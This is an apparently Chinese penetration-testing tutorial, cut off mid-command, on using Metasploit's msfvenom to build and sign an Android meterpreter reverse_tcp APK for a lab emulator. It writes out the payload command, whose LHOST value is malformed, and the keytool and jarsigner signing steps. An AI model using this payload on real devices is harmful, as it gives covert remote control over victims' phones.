在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。创建负载我们需要两台虚拟机:Kali Linux和安卓模拟器。 打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apkp 设置要使用的payloadLHOST 设置用来接收反弹连接的主机LPORT 设置用来接收反弹连接的端口R 设置文件格式Location 要保存的文件位置这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。我们可以使用如下工具进行手动签名:l Keytool (已安装)l jar signer (已安装)l zipalign (需要安装)执行下列命令签名。首先使用密钥工具创建密钥库。keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000`然后使用JARsigner签名APKjarsigner -verbose -sigalg SHA1withRSA -digestalg SHA
如何使用Metasploit对安卓手机进行控制
最新推荐文章于 2024-06-11 09:45:34 发布